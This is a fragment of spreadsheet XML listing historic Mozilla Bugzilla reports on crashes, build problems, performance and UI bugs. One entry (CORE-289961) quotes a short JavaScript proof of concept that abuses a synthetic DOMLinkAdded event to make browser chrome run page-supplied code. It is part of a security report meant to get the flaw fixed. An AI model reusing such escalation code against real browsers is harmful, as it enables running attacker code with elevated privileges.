A typical stack looks like:
nsFrame::Destroy()
nsContainerFrame::Destroy()
nsFrameList::DestroyFrames()
nsContainerFrame::Destroy()
nsBlockFrame::DoRemoveFrame(nsIFrame* int int)
nsBlockFrame::RemoveFrame(nsIAtom* nsIFrame*)
nsFrameManager::RemoveFrame(nsIFrame* nsIAtom* nsIFrame*)
nsCSSFrameConstructor::ContentRemoved(nsIContent* nsIContent* int int)
nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*)
nsCSSFrameConstructor::ProcessRestyledFrames(nsStyleChangeList&amp;)
nsPresContext::ClearStyleDataAndReflow()
DocumentViewerImpl::SetTextZoom(float)</t>
  </si>
  <si>
    <t>CORE-97174</t>
  </si>
  <si>
    <t>startup perf- remove the need of loading of wincharset.properties files at startup time to speed up</t>
  </si>
  <si>
    <t>we currently load wincharset.properties at startup time we should find a way to 
remove the need of loading it at startup time to speed up startup performance
we could 
1. build in common used pair in the cpp code and/or
2. cache the resolved result in registry.</t>
  </si>
  <si>
    <t>CORE-452676</t>
  </si>
  <si>
    <t>PNG Pseudo-CMS chunks (gAMA and cHRM) aren't handled properly with color management on</t>
  </si>
  <si>
    <t>This is causing some reftest failures. I've got a patch.</t>
  </si>
  <si>
    <t>CORE-172700</t>
  </si>
  <si>
    <t>NS_ConvertUTF8ToUCS2() surrogates buffer overflow</t>
  </si>
  <si>
    <t>The following patch supports characters outside of the BMP.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-479147</t>
  </si>
  <si>
    <t>pull new talos ref images to incorporate unthrottling.</t>
  </si>
  <si>
    <t>I have updated:
qm-ref-xp
qm-ref-vista
qm-ref-ubuntu
They are now unthrottled by default.  New images should be taken from these boxes to become the new default talos images for their respective platforms.</t>
  </si>
  <si>
    <t>SEAMONKEY-193614</t>
  </si>
  <si>
    <t>Febraury 16th build does not launch</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.3b) Gecko/20030212
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.3b) Gecko/20030212
The February 16th build does not launch.  The icon bounces up and down for a few
seconds and then the application quits.
Reproducible: Always
Steps to Reproduce:
1.Launch Mozilla application
2.
3.
Actual Results:  
The mozilla icon bounces up and down in the dock for a few minutes and then quits.
Expected Results:  
Mozilla should have opened with a splash screen and then opened a new window.
I am running Mac OS 10.2.4.  This is a regression since the build on the 14th or
15th.</t>
  </si>
  <si>
    <t>orbplus2000</t>
  </si>
  <si>
    <t>BUGZILLA-361114</t>
  </si>
  <si>
    <t>Release Bugzilla 2.20.4 2.22.2 and 2.23.4</t>
  </si>
  <si>
    <t>SEAMONKEY-251950</t>
  </si>
  <si>
    <t>Ctrl+W doesn't close help window</t>
  </si>
  <si>
    <t>CTRL+W the close window shortcut key doesn't close the Firefox Help window.
 This is contrary to the behaviour with the Mozilla suite's help window (as of
the 2004-07-05 build at least) where CTRL+W closes it.</t>
  </si>
  <si>
    <t>skydaemon80</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-508363</t>
  </si>
  <si>
    <t>Create new site template</t>
  </si>
  <si>
    <t>CORE-289961</t>
  </si>
  <si>
    <t>DOMLinkAdded events synthesized by content can make chrome access non-DOM JS property rel</t>
  </si>
  <si>
    <t>In bug 289074 comment 56 moz_bug_r_a4@yahoo.com wrote:
# And if there is no real getter/setter the user-defined getter/setter will
# be used. (Is this behavior benefited by unsafe_gsfun? if so already fixed.)
# Thus the following code can exploit.
#
#   // Body doesn't have |rel| property
#   document.body.__defineGetter__(rel function() {
#     return { toString : new Script(code) }
#   })
#
#   var event = document.createEvent(Events)
#   event.initEvent(DOMLinkAdded true true)
#   document.body.dispatchEvent(event)
Testcase is attachment 180192.
The real fix for this is bug 289940 (or bug 281988).  (Or perhaps also something
to caps -- I'm not sure why |new Script| can be used this way.)  But I'll attach
a patch here to fix just this one case as we've already done for a bunch of
other cases since bug 289940 is probably a bit much for 1.0.3.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-154914</t>
  </si>
  <si>
    <t>Press Enter on collapsed history tree item causes page load.</t>
  </si>
  <si>
    <t>Open the history window. Highlight a collapsed tree item like Today for
example. Press Enter. The focus changes to a browser window and a page tries to
load. I'm not sure what the URL is.</t>
  </si>
  <si>
    <t>smeredith</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-714551</t>
  </si>
  <si>
    <t>Aurora What's New page offers release version</t>
  </si>
  <si>
    <t>http://www.mozilla.org/en-US/firefox/11.0/whatsnew/
Even going to the page using 9.0.1 I'm told it's out of date</t>
  </si>
  <si>
    <t>NSS-366390</t>
  </si>
  <si>
    <t>correct misleading function names in fipstest</t>
  </si>
  <si>
    <t>Some of the functions in fipstest.c are named the opposite of what they do.  
e.g. functions named hex_from_ actually convert values FROM 
hex ASCII to binary and functions named _from_hex convert 
FROM binary TO hex ASCII.  
I propose to rename these functions as follows:
-hex_from_2char(const char *c2 unsigned char *byteval)
+hex_to_byteval(const char *c2 unsigned char *byteval)
-char2_from_hex(unsigned char byteval char *c2 char a)
+byteval_to_hex(unsigned char byteval char *c2 char a)</t>
  </si>
  <si>
    <t>MOZILLA_LABS-469676</t>
  </si>
  <si>
    <t>Stub should set environment variables on Windows as well as OS X</t>
  </si>
  <si>
    <t>Currently the Prism stub uses the values from the [Environment] section of application.ini on OS X only. This should work on Windows as well so that applications can use the stub without parameters if they want (e.g. the path is too long if -webapp -profile -override etc. have to be specified in the command line).</t>
  </si>
  <si>
    <t>SEAMONKEY-202510</t>
  </si>
  <si>
    <t>Remove _*_SOURCE defines from default linux configuration</t>
  </si>
  <si>
    <t>The _POSIX_SOURCE &amp; _SVID_SOURCE defines were used to limit the number of
warnings we see due to system header quirks that annoyed the compiler (like
zero-length arrays).  We're beginning to use the extended API set of glibc more
so we really do not need to limit ourselves to just the POSIX or SVID subset.</t>
  </si>
  <si>
    <t>CORE-448903</t>
  </si>
  <si>
    <t>Crash [@ nsContextBoxBlur::BoxBlurVertical] with text-shadow</t>
  </si>
  <si>
    <t>Created attachment 332091
testcase
Loading the testcase makes nsContextBoxBlur::BoxBlurVertical dereference a random address which usually causes a crash.</t>
  </si>
  <si>
    <t>NSPR-51743</t>
  </si>
  <si>
    <t>PR_EnterMonitor() makes an unnecessary pthread_mutex_trylock() call.</t>
  </si>
  <si>
    <t>In the pthreads version (ptsynch.c) PR_EnterMonitor()
makes a pthread_mutex_trylock() call that seems unnecessary.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-522508</t>
  </si>
  <si>
    <t>remove mozillaservice.org email lists</t>
  </si>
  <si>
    <t>Please disable all the mozillaservice.org email aliases. 
I think there are three
help@
info@
I don't remember the third.
Can we have an auto-reply on help@mozillaservice.org that states
Mozilla Service Week is complete. 
If you need technical support please contact us via Live Chat
http://support.mozilla.com/en-US/kb/Live+Chat?new_chat
or search our support site for an answer to your question.
Thanks
Mozilla Service Week
http://mozillaservice.org</t>
  </si>
  <si>
    <t>BUGZILLA-428511</t>
  </si>
  <si>
    <t>Status and resolution values in dependency trees not localizable</t>
  </si>
  <si>
    <t>Created attachment 315104
Patch
Status and resolution values in dependency trees are not localizable. The attached patch fixes this.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-403603</t>
  </si>
  <si>
    <t>Over One minute IMAP online copy or move retried forever and mail FLOODING!</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 ja rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9
Build Identifier: HEAD
If IMAP online Copy or Move timeouted thunderbird retries it forever.
And mail FLOODING!
And IMAP server is saturated.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Actual Results:  
I made a patch!
Index: mailnews/imap/src/nsImapProtocol.cpp
===================================================================
RCS file: /cvsroot/mozilla/mailnews/imap/src/nsImapProtocol.cppv
retrieving revision 1.671
diff -u -8 -p -r1.671 nsImapProtocol.cpp
--- mailnews/imap/src/nsImapProtocol.cpp	9 Nov 2007 15:07:23 -0000	1.671
+++ mailnews/imap/src/nsImapProtocol.cpp	13 Nov 2007 11:04:01 -0000
@@ -31117 +31117 @@ static PRBool gFetchByChunks = PR_TRUE
 static PRInt32 gMaxChunkSize = 40960
 static PRBool gInitialized = PR_FALSE
 static PRBool gHideUnusedNamespaces = PR_TRUE
 static PRBool gHideOtherUsersFromList = PR_FALSE
 static PRBool gUseEnvelopeCmd = PR_FALSE
 static PRBool gUseLiteralPlus = PR_TRUE
 static PRBool gExpungeAfterDelete = PR_FALSE
 static PRBool gCheckDeletedBeforeExpunge = PR_FALSE //bug 235004
-static PRInt32 gResponseTimeout = 60
+static PRInt32 gResponseTimeout = 8400
 static nsCStringArray gCustomDBHeaders
 nsresult nsImapProtocol::GlobalInitialization()
 {
     gInitialized = PR_TRUE
     nsresult rv
     nsCOMPtr prefBranch(do_GetService(NS_PREFSERVICE_CONTRACTID 
     NS_ENSURE_SUCCESS(rv rv)
@@ -159618 +159623 @@ PRBool nsImapProtocol::RetryUrl()
   nsCOMPtr  saveMockChannel
   m_runningUrl-&gt;GetMockChannel(getter_AddRefs(saveMockChannel))
   ReleaseUrlState(PR_TRUE)
   nsresult rv
   nsCOMPtr imapServer  = do_QueryReferent(m_server 
   kungFuGripImapUrl-&gt;SetMockChannel(saveMockChannel)
   if (NS_SUCCEEDED(rv))
     imapServer-&gt;RemoveConnection(this)
-  if (m_imapServerSink)
-    m_imapServerSink-&gt;RetryUrl(kungFuGripImapUrl)
+  if (m_imapServerSink){
+    nsImapAction imapaction
+    kungFuGripImapUrl-&gt;GetImapAction(
+    if(imapaction != nsIImapUrl::nsImapOnlineCopy &amp;&amp; imapaction != nsIImapUrl::nsImapOnlineMove){
+        m_imapServerSink-&gt;RetryUrl(kungFuGripImapUrl)
+    }
+  }
   return (m_imapServerSink != nsnull) // we're running a url (the same url)
 }
 // ignoreBadAndNOResponses --&gt; don't throw a error dialog if this command results in a NO or Bad response
 // from the server..in other words the command is exploratory and we don't really care if it succeeds or fails.
 void nsImapProtocol::ParseIMAPandCheckForNewMail(const char* commandString PRBool aIgnoreBadAndNOResponses)
 {
     if (commandString)</t>
  </si>
  <si>
    <t>lenin</t>
  </si>
  <si>
    <t>FIREFOX-247116</t>
  </si>
  <si>
    <t>Web pages bounce/shake/jump when Bookmarks Toolbar Items is empty and placed to right of menu bar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040614 Firefox/0.9
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040614 Firefox/0.9
After modifying the toolbar and deleting all links the webpage (html) would
start to move up and down rapidly.
Reproducible: Always
Steps to Reproduce:
1. I customized the toolbar by relocating the Bookmarks Toolbar Items up
beside the menus (immediately to the right of 'help').
2. Then I deleted all items in the bookarms toolbar (the three default links
after a fresh install).
3. I then went to a new website and the entire page (not the browser interface
just the html) began to move 10 or so pixels up and down in half-second intervals.
4. Sometimes going to a new page would resolve the 'bouncing' but by minimizing
and maximizing the browser the problem reoccured.
Actual Results:  
The website would start moving up and down several pixels in half-second intervals.
Expected Results:  
Displayed the webpage without the content moving.
This happened on a fresh install of Firefox not 10 minutes after completing the
installation.</t>
  </si>
  <si>
    <t>jayemery</t>
  </si>
  <si>
    <t>DIRECTORY-28001</t>
  </si>
  <si>
    <t>Parsing in LDAPUrl(String url) ignores attributes</t>
  </si>
  <si>
    <t>I create an instance of LDAPUrl using the constructor LDAPUrl (String url).
My LDAP URL LDAP://127.0.0.1/?sn?sub?(|(cn=a*)) has attributes but no DN. 
During the parsing of the URL string the attributes are ignored.
In Version 1.4 of LDAPUrl.java in Line 152 readNextConstruct(urlParser)
is called. In readNextConstruct() are two calls of StringTokenizer.nextToken().
This is correct if you have a DN. In this case the first call
returns the '?' and the next returns the attributes. But if you have
no DN (DN.equals(?) in Line 144) the first call returns the attributes
and the second retuns the '?' after the attributes.</t>
  </si>
  <si>
    <t>Peter.Kilian</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-526786</t>
  </si>
  <si>
    <t>[tracker] Remove select boxes that list every wikipage/poll</t>
  </si>
  <si>
    <t>There are a bunch of selects in the interface that list every single poll or wiki article.  With thousands of such articles (including translations and staging) and two polls for each it's causing HUGE lists of things to be output that must then be parsed and then run through dozens of regexp filters -- not to mention every item is checked for permissions which is dozens of database queries each.  This times out constantly.  
Generally speaking we don't use the polls/article lists in this way (we've never put polls in the sidebar modules or in dynamic content) and if we did we could always just use a text input area rather than a dropdown. This will dramatically speed up pages like tiki_admin_modules etc.
The same goes for freetags article translation etc.  Sometimes we just don't need a list of all the options and it takes longer to scroll through 10K lines looking for what you want than it would to just type it.</t>
  </si>
  <si>
    <t>cww</t>
  </si>
  <si>
    <t>CORE-264915</t>
  </si>
  <si>
    <t>Remove FlushPendingEvents calls in nsEventStateManager</t>
  </si>
  <si>
    <t>These were added for bug 36849.  I suspect that given that we now batch view
updates and that visual style changes do a DEFERRED view update batch we can
eliminate this code altogether.  At the moment we flush out all the reflows and
repaints on each mousemove...  That's really not called for.
I'll do some testing to make sure we don't regress bug 36849 and I'll wait till
after we're done with the regressions from bug 238493.  After that I hope to be
able to remove a lot of this stuff.</t>
  </si>
  <si>
    <t>CORE-326985</t>
  </si>
  <si>
    <t>jsinterp.c(975) : warning C4013: 'OBJECT_IS_XML' undefined assuming extern returning int</t>
  </si>
  <si>
    <t>jsinterp.c(975) : warning C4013: 'OBJECT_IS_XML' undefined assuming extern returning int
my non xml build died (i don't update very often...)</t>
  </si>
  <si>
    <t>CORE-212104</t>
  </si>
  <si>
    <t>Browser just exits when find finds a link while running with gtk 2.2 and atk libraries on AIX</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U AIX 00FFFFFF4C00 en-US rv:1.4) Gecko/20030702
Build Identifier: Mozilla/5.0 (X11 U AIX 00FFFFFF4C00 en-US rv:1.4) Gecko/20030702
While running with the gtk accessibility modules mozilla will exit if a search
is done within a web page and the search finds a link.  If the search finds just
text there is not a problem.  
Reproducible: Always
Steps to Reproduce:
1. Start mozilla so the accessibility library is loaded.
2.  Go to www.mozilla.org
3.  type a '/' to start typeaheadfind.
4.  type an 'm'
Actual Results:  
browser just exits.  
Expected Results:  
First m in mozilla.org link would be hightlighted as the found letter.</t>
  </si>
  <si>
    <t>simford</t>
  </si>
  <si>
    <t>mlew</t>
  </si>
  <si>
    <t>FIREFOX-347783</t>
  </si>
  <si>
    <t>[mac] Tab listing bar loses styling after tab overflow background animation</t>
  </si>
  <si>
    <t>Seen using Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1b1) Gecko/20060807 BonEcho/2.0b1 on my machine Asa has seen on his Intel mac as well.
STR:
1. Make sure to have pref checked for Always show the tab bar.
2. Open the Latest Headlines RSS feed in tabs.
3. After the feeds load click on the first tab and then select close other tabs.
4. Observe that the styling for the tab listing bar has now disappeared.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-320082</t>
  </si>
  <si>
    <t>Comment field length needs a sanity check</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
I discovered this fiddling around with some of the form filling extensions. The form field length is reported as unknown by the extension. I typed in some nonsence then copy / pasted for about a minute. No end of field. I'm guessing it's 65000 in the database but the webpage itself needs a sanity check. Personally I can't see more than 1000 ever being necessary perhaps 500. Anyway currently a user could hose the page loading by submitting an insanely long comment. Note I didn't actually submit a comment like that so if there is a sanity check post form submit I apologize for the bug report in the first place.
Reproducible: Always
Steps to Reproduce:
1. Click any extension 'add your own comment' link
2. Fill in the form with trash over and over
3. Click Post if you want to REALLY annoy the moderators. )
Actual Results:  
Not tested but hung page load or rediculously long page
Expected Results:  
Decently long extension page
Most likely just needs a form field length on the actual page coding. I'm marking this security as I've seen other bugs marked severe for such form length issues.</t>
  </si>
  <si>
    <t>crogonint</t>
  </si>
  <si>
    <t>CORE-367059</t>
  </si>
  <si>
    <t>Reversed assertion test in PopException (Uh no NPP exception to pop!)</t>
  </si>
  <si>
    <t>Created attachment 251571
Patch
This makes running a debug build a huge pain. The test got reversed somehow and so it's asserting for no reason.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-269632</t>
  </si>
  <si>
    <t>GFX: OS/2</t>
  </si>
  <si>
    <t>Add paint flashing for OS/2</t>
  </si>
  <si>
    <t>jonitis</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-331333</t>
  </si>
  <si>
    <t>Do not link libthebes into libgkwidget as a SHARED_LIBRARY_LIB</t>
  </si>
  <si>
    <t>Among several other patches this fix was proposed by Chris Seawood in Bug
328499 Comment 34 libthebes is a dynamic lib so don't attempt to link it into libgkwidget as a SHARED_LIBRARY_LIB.
Note that thebes is already linked here
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/widget/src/build/Makefile.in&amp;rev=1.61&amp;mark=69-71#50</t>
  </si>
  <si>
    <t>engel</t>
  </si>
  <si>
    <t>FIREFOX-392494</t>
  </si>
  <si>
    <t>Distribution customizations should not be easily removable by end users</t>
  </si>
  <si>
    <t>This is a tracking bug for item DIST-001b in the Firefox 3 PRD.</t>
  </si>
  <si>
    <t>TOOLKIT-251017</t>
  </si>
  <si>
    <t>software update error dialog broken</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040712
Firefox/0.9.1+ (Steffen)
After Ben's checkin from 2004-07-12 02:23 the error dialog doesn't show errors
anymore.
1. In extension mgr select DOM Inspector and click Update.
2. no update found is displayed. Click Details.
Result: An empty errors.xul dialog.
The js console shows this error:
Error: uncaught exception: [Exception... Component returned failure code:
0x80004005 (NS_ERROR_FAILURE) [nsIStringBundle.GetStringFromName]  nsresult:
0x80004005 (NS_ERROR_FAILURE)  location: JS frame :: XStringBundle ::
getString :: line 16  data: no]
It's this line:
var errorString = xpinstallStrings.getString(error + items[i].error)
The problem is that items[i].error is true. But there is no errortrue string
in xpinstallStrings.</t>
  </si>
  <si>
    <t>BUGZILLA-398739</t>
  </si>
  <si>
    <t>Taking a bug while adding a new attachment locks the bug status forever if the ASSIGNED bug status has been renamed or deleted</t>
  </si>
  <si>
    <t>When you take a bug while adding a new attachment attachment.cgi runs:
      my @newvalues = ($user-&gt;id ASSIGNED  1 $user-&gt;login)
      $dbh-&gt;do('UPDATE bugs SET delta_ts = ? ' .
               join(' ' map($fields[$_] = ? (0..3))) . ' WHERE bug_id = ?'
               undef ($timestamp map($newvalues[$_] (0..3))  $bugid))
This means the bug status is set to ASSIGNED. But if you renamed or deleted this bug status (from editvalues.cgi) ASSIGNED isn't valid and process_bug.cgi will reject all subsequent changes made against the bug as no bug status transition between the unknown ASSIGNED status and any other status is defined in the workflow.
The reason to mark this bug as a blocker is that the first bug status you would rename is ASSIGNED (to INPROGRESS ACCEPTED or anything else based on previous bug reports on b.m.o) so the probability to see such problems is very high.</t>
  </si>
  <si>
    <t>FIREFOX-339361</t>
  </si>
  <si>
    <t>Code style in nsSearchSuggestions.js is 'orrible</t>
  </si>
  <si>
    <t>This was some ancient code landed by mconnor in a rush and it needs tidying up.  See https://bugzilla.mozilla.org/show_bug.cgi?id=338061#c33 for starters.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-421014</t>
  </si>
  <si>
    <t>wowarmory.com - tooltips broken in non-Firefox Gecko browsers</t>
  </si>
  <si>
    <t>confirmed from reporter reports:
...The site loads just fine but when you highlight over the character profile items (this applys to everyone on the site) it will only show loading and never really load. Is there any fix to this? This did work in firefox 2.0 
nominating until we can figure out if its core or evangelism and understand how widespread it might be...</t>
  </si>
  <si>
    <t>CORE-136260</t>
  </si>
  <si>
    <t>ChromeWindow Object wrapped by XPConnect has members whose names shadow each other</t>
  </si>
  <si>
    <t>!!!Object wrapped by XPConnect has members whose names shadow each other!!!
   XPCNativeSet @ 0x0x824b940 for the class:
   classname: ChromeWindow
   contractid: 
   claims to implement interfaces:
      nsISupports
      nsIDOMWindow
      nsIDOMJSWindow
      nsIDOMWindowInternal
      nsIDOMChromeWindow
      nsIDOMEventTarget
      nsIDOMViewCSS
      nsIDOMAbstractView
nsIDOMWindow::document shadows nsIDOMViewCSS::document
nsIDOMWindow::document shadows nsIDOMAbstractView::document
nsIDOMJSWindow::prompt shadows nsIDOMWindowInternal::prompt
nsIDOMWindowInternal::document shadows nsIDOMViewCSS::document
nsIDOMWindowInternal::document shadows nsIDOMAbstractView::document
XPC - Begin deferred Release of 37 nsISupports pointers
XPC - End deferred Releases
This debug output was generated by setting DEBUG_xpc_hacker in
mozilla/js/src/xpconnect/src/xpcprivate.h
Steps:
add flag to xpconnect rebuild xpconnect
run mozilla navigator</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-116172</t>
  </si>
  <si>
    <t>Brainjar.com - Tracking bug - Mike Hall dhtmllib et al</t>
  </si>
  <si>
    <t>This bug is to be used to track Mike Hall scripts. Note that some of these have
been hosted on DynamicDrive.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-361161</t>
  </si>
  <si>
    <t>Reporter doesn't work for suiterunner (MOZ_XUL_APP=1) builds</t>
  </si>
  <si>
    <t>Report Broken Web Site doesn't appear in the help menus for SeaMonkey builds where MOZ_XUL_APP=1. This will need fixing for when SeaMonkey becomes an xul app.
I suspect the problem is with http://lxr.mozilla.org/seamonkey/source/extensions/reporter/jar.mn
I'll try and get a patch done in a few days if no one else does.</t>
  </si>
  <si>
    <t>SEAMONKEY-394520</t>
  </si>
  <si>
    <t>Switch urlbar history to sqlite</t>
  </si>
  <si>
    <t>It's currently using an RDF container in localstore to avoid getting bitten by a localstore sqlite conversion we should switch it in advance. I considered XML and prefs but thought sqlite would be easiest to write.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-505215</t>
  </si>
  <si>
    <t>x86_64 Linux tinderboxes missing wireless-tools-devel</t>
  </si>
  <si>
    <t>The x86_64 Linux tinderboxes are missing the wireless-tools-devel package which means they can't build the Necko Wifi code used for geolocation.
Prior to bug 503597 this caused the feature to be silently disabled (thus silently disabling one of our major new platform features).  With bug 503597 this (as desired) results in an error so that we don't accidentally disable major platform features.
What needs to be fixed is (thanks to bug 505203 / bug 505204) equivalent to Version 16 in https://wiki.mozilla.org/ReferencePlatforms/Linux-CentOS-5.0#Version_16
I suppose I'll have to temporarily back out bug 503597 until this is fixed.</t>
  </si>
  <si>
    <t>BUGZILLA-451707</t>
  </si>
  <si>
    <t>Provide an --version option to checksetup.pl</t>
  </si>
  <si>
    <t>I'm so used to run some_program --version to get information (and especially the version) about a program without running it for real that I'm sometimes tempted to do the same with checksetup.pl when playing with many installations (which installation am I playing with?). Also when people ask for help on IRC we ask for their version and they reply how do I get it?. We have to tell them to go to index.cgi and look at the version at the top right of the page or look at config.cgi or look at Constants.pm... or to run checksetup.pl which will compile templates and take some time to complete (if run with no arguments).
I think it would be great if we were implementing checksetup.pl --version so that we have an easy way to tell people how to get the information without all the workarounds above. And without having checksetup.pl trying to install Bugzilla! Its output could be as simple as:
* This is Bugzilla 3.3 on perl 5.8.8
* Running on Linux 2.6.22.19-desktop586-2mdv #1 SMP Mon May 5 20:45:47 EDT 2008
or be an alias for checksetup.pl --check-modules if that's easier to implement.</t>
  </si>
  <si>
    <t>CORE-416455</t>
  </si>
  <si>
    <t>App-focus wierdness after right-clicking on backgrounded browser window</t>
  </si>
  <si>
    <t>Strange app-focus problems happen when you right-click on a browser
window that belongs to a backgrounded instance of Minefield and then
cause another window to be opened.
This problem is a regression caused (or at least triggered) by the
patch for bug 396186.  It doesn't happen when you roll back that bug's
patch (attachment 297284).
STR
1) Run Minefield and make sure at least one browser window is open.
2) Click on the desktop (or another app) to put Minefield into the
   background but leave its browser window visible.
3) Right-click on that browser window and (from the resulting context
   menu) choose View Page Source or View Page Info.
   A new window will appear (containing either the page source or the
   page info).  Minefield will still be in the background and the
   main menu will remain as before (i.e. it will not switch to the
   Minefield menu).  This is the correct behavior.
   But left-clicking on any of the browser's windows (the browser
   window the page source window or the page info window) will not
   switch the app focus to Minefield -- the main menu will not switch
   to the Minefield menu and it won't be possible to place the
   keyboard focus into any of its windows.  This is not correct.
   Correct behavior can be restored by clicking	on the desktop (or
   another app) and then clicking once more on one of Minefield's
   visible windows.
The easiest way to fix this bug is to roll back the patch for bug
396186.  Given sufficient time I may be able to find another way to
fix it ... but we don't have a lot of time before the Firefox 3
release.</t>
  </si>
  <si>
    <t>CORE-317240</t>
  </si>
  <si>
    <t>Sort out principals vs scopes situation</t>
  </si>
  <si>
    <t>When I wrote the patch for bug 289655 I was assuming that there is only one relevant principal per XPCWrappedNativeScope (the latter correspond to script global objects).  Unfortunately the asserts I added in that patch fire indicating that this is not the case.
One obvious offender from looking at stacks is XMLHttpRequest.  What happens there is that XMLHttpRequest returns a new Document object one that has its own principal (based on the URI loaded via XMLHttpRequest).  But there's only one scope around -- that of the caller since the XMLHttpRequest document has no script global of its own.  Hence the JSObject for that document has the caller as __parent__.  And that caller's principal may not be the same as the document's principal which triggers an assert.
Now before the patch for bug 289655 what would happen is that for the XMLHttpRequest document itself and for all nodes in it we'd end up with the XMLHttpRequest document's principal (due to the preCreate hook on the nodes).  But for various other objects (return values of .childNodes getElementsByTagName() .style etc) we would end up with the calling scope as the principal for the newly created object.
I _think_ this is only an issue for cases where a document has no scope of its own given that XPConnect uses the object we're working with as initial scope object for wrapping things.  But I'm not sure.
In any case given the fact that the one scope one principal invariant doesn't hold what do we want to do?  We could back out bug 289655 -- that means we'd still have issues for everything without a preCreate hook but that might just be what we have to live with.  We could try to make this invariant hold which means that all documents would at least have their own XPConnect scope (if not their own inner window).  That might be a pretty tough change though...
Thoughts?  Please feel free to cc others on this bug if I've forgotten someone who might have an idea on this...</t>
  </si>
  <si>
    <t>CALENDAR-311067</t>
  </si>
  <si>
    <t>Calendar colors not honored</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b5) Gecko/20051003 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20051004 Mozilla Sunbird/0.2+
In the 20051004 build colors of calendars are not honored (events are always
the background color rather than the one selected for the calendar).
Reproducible: Always
Steps to Reproduce:
1.Change color of calendar in Calendars tab
2.Create event
3.
Actual Results:  
Event is white
Expected Results:  
Event is color I chose
Started with the 1004 build (not a problem in 1003)</t>
  </si>
  <si>
    <t>lhabib</t>
  </si>
  <si>
    <t>CORE-191684</t>
  </si>
  <si>
    <t>[ps] Mozilla kills printer</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0.1) Gecko/20020823 Netscape/7.0
Build Identifier: http://ftp.mozilla.org/pub/mozilla/nightly/latest-trunk/mozilla-i686-pc-linux-gnu.tar.gz
Mozilla kills our printers which have to be re-set by the sysadmin afterwards.
Reproducible: Always
Steps to Reproduce:
1. open any URL
2. print
Actual Results:  
Actual result is that printer hangs and refuses to accept any job. Turning it
off and on is the only solution to make it to accept new jobs.
Expected Results:  
Paper with printouts and no angry sysadmin.
http://ftp.mozilla.org/pub/mozilla/releases/mozilla1.2.1/mozilla-i686-pc-linux-gnu-1.2.1-sea.tar.gz
works with english pages.
http://ftp.mozilla.org/pub/mozilla/nightly/latest-trunk/mozilla-i686-pc-linux-gnu.tar.gz
kills printers and makes sysadmin to hate Mozilla.</t>
  </si>
  <si>
    <t>CORE-224765</t>
  </si>
  <si>
    <t>[FIX][@ nsXBLService::LoadBindings]</t>
  </si>
  <si>
    <t>nsXBLService::LoadBindings   4
		 34044 	 RESOLVED 	 FIXED 	 hyatt@mozilla.org 	 M15 	 2000-04-25
		 90235 	 VERIFIED 	 FIXED 	 bugs@bengoodger.com 	 mozilla1.0 	 2001-09-19 
BBID range: 24597610 - 24776573
Min/Max Seconds since last crash: 302 - 37945
Min/Max Runtime: 302 - 37945
Crash data range: 2003-10-20 to 2003-10-25
Build ID range: 2003102004 to 2003102404
Stack Trace: 
	 nsXBLService::LoadBindings
[c:/builds/seamonkey/mozilla/content/xbl/src/nsXBLService.cpp  line 563]
	 nsCSSFrameConstructor::ConstructFrameInternal
[c:/builds/seamonkey/mozilla/layout/html/style/src/nsCSSFrameConstructor.cpp 
line 7129]
	 nsCSSFrameConstructor::ConstructFrame
[c:/builds/seamonkey/mozilla/layout/html/style/src/nsCSSFrameConstructor.cpp 
line 7086]
	 nsCSSFrameConstructor::ContentInserted
[c:/builds/seamonkey/mozilla/layout/html/style/src/nsCSSFrameConstructor.cpp 
line 9028]
	 nsCSSFrameConstructor::RecreateFramesForContent
[c:/builds/seamonkey/mozilla/layout/html/style/src/nsCSSFrameConstructor.cpp 
line 11580]
	 nsCSSFrameConstructor::AttributeChanged
[c:/builds/seamonkey/mozilla/layout/html/style/src/nsCSSFrameConstructor.cpp 
line 10279]
	 StyleSetImpl::AttributeChanged
[c:/builds/seamonkey/mozilla/content/base/src/nsStyleSet.cpp  line 1690]
	 PresShell::AttributeChanged
[c:/builds/seamonkey/mozilla/layout/html/base/src/nsPresShell.cpp  line 5283]
	 nsXULDocument::AttributeChanged
[c:/builds/seamonkey/mozilla/content/xul/document/src/nsXULDocument.cpp  line 1152]
